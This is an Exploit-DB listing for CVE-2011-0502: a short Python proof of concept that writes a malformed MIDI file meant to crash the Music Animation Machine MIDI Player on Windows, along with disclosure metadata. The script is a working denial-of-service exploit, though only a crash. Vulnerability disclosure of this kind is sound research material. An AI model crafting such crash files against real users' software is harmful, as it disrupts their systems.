Music Animation Machine MIDI Player - Local Crash (PoC)

Author: c0d3R'Z
type: dos
platform: windows
port: 
date_added: 2011-01-03  
date_updated: 2011-01-03  
verified: 1  
codes: CVE-2011-0502;OSVDB-70614  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt16000/screen-shot-2011-01-04-at-121316-am.png  
application_url:   

raw file: 15897.py  

# Exploit Title: Music Animation Machine MIDI Player Local Crash PoC
# Date: 1/3/2011
# Author: c0d3R'Z
# Software Link: http://www.musanim.com/player/MAMPlayer2006aug19_035.zip
# Version: Release 035
# Tested on: Windows XP SP2 EN (VirtualBox)


# The application crashes when trys to convert a malformed midi file

#!/usr/bin/python

buffer     = "\x31\x33\x33\x37" * 1337

try:
    f = open("test.mid",'w')
    f.write(buffer)
    f.close()

    print " Vulnerable file created!..."
    print " Open the mid file with the application and Voila!! , it crashes!!\n"
except:
    print "[-] Error occured!"